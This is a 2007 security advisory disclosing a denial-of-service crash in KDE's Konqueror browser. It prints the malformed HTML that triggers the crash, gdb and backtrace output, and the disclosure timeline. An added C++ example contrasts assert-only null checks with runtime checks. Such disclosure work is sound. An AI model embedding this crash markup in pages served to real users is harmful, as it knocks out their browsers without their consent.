---------------------------------------------------
| BuHa Security-Advisory #16 |     Aug 01st, 2007 |
---------------------------------------------------
| Vendor  | KDE's Konqueror                       |
| URL     | http://www.konqueror.org/             |
| Version | <= 3.5.7                              |
| Risk    | Low (Denial Of Service)               |
---------------------------------------------------

o Description:
=============

Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance. Visit
http://www.konqueror.org/ for detailed information.

o Denial of Service:
===================

The following HTML code forces Konqueror to crash:

> <textarea></button></textarea></br><bdo dir="">
> <pre><frameset>
> <a>

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

> (gdb) set args konqueror.html
> (gdb) r
> Starting program: /usr/bin/konqueror konqueror.html
> (no debugging symbols found)
> [...]
> [Thread debugging using libthread_db enabled]
> [New Thread -1234381104 (LWP 5982)]
> (no debugging symbols found)
> [...]
> Qt: gdb: -nograb added to command-line options.
> Use the -dograb option to enforce grabbing.
> X Error: BadDevice, invalid or uninitialized input device 169
>   Major opcode:  145
>   Minor opcode:  3
>   Resource id:  0x0
> Failed to open device
> X Error: BadDevice, invalid or uninitialized input device 169
>   Major opcode:  145
>   Minor opcode:  3
>   Resource id:  0x0
> Failed to open device
> (no debugging symbols found)
> [...]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1234381104 (LWP 5982)]
> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.

I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code
triggers an assert and that, when the assert is commented out, the
backtrace ends in:

> #6  0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
>     at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
> #7  0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
>     obj=0x0)
>     at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable.

o Disclosure Timeline:
=====================

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:
==========

There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.

o Credits:
=========

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a spam
address than a regular mail address, therefore it is possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/

--
Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/
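As an added illustration of the failure mode the backtrace points at (this is not KDE's code; the names RenderFlow, createLineBoxes and lastLineBox are borrowed from the trace, and the bodies are assumptions), the following shows why an assert-only guard turns into a null this-pointer in a release build, and what an explicit runtime check looks like beside it:

```cpp
#include <cassert>
#include <cstdio>

// Hypothetical stand-ins for khtml's types (assumed, not KDE's code).
struct InlineBox { int width; };

struct RenderFlow {
    InlineBox* m_lastLineBox = nullptr;
    // Called through a null pointer this is the "this=0x0" of frame #6.
    InlineBox* lastLineBox() const { return m_lastLineBox; }
};

// Assert-only guard: NDEBUG (release builds) compiles the assert away,
// so a null obj (frame #7, obj=0x0) falls through into the member call.
InlineBox* createLineBoxes_assert_only(RenderFlow* obj) {
    assert(obj != nullptr);      // present in debug builds only
    return obj->lastLineBox();   // null this -> SIGSEGV in release
}

// Hardened form: an explicit check that survives NDEBUG; returns false so
// the caller can abandon layout instead of crashing the browser.
bool createLineBoxes_checked(RenderFlow* obj, InlineBox** out) {
    if (obj == nullptr) { *out = nullptr; return false; }
    *out = obj->lastLineBox();
    return true;
}

// True when assert() is live in this build (NDEBUG not defined).
bool asserts_enabled() {
#ifdef NDEBUG
    return false;
#else
    return true;
#endif
}

// Exercise both paths on a constructed renderer: the checked variant must
// return the box for a live renderer and refuse a null one without a deref.
bool demo_checked_paths() {
    InlineBox box{42};
    RenderFlow flow;
    flow.m_lastLineBox = &box;
    InlineBox* out = nullptr;
    bool live_ok = createLineBoxes_checked(&flow, &out) && out == &box;
    bool null_ok = !createLineBoxes_checked(nullptr, &out) && out == nullptr;
    return live_ok && null_ok;
}

int main() {
    std::printf("asserts %s\n", asserts_enabled() ? "on" : "off");
    return demo_checked_paths() ? 0 : 1;
}
```

Building once with and once without -DNDEBUG shows the assert-only guard disappearing while the checked variant behaves the same in both.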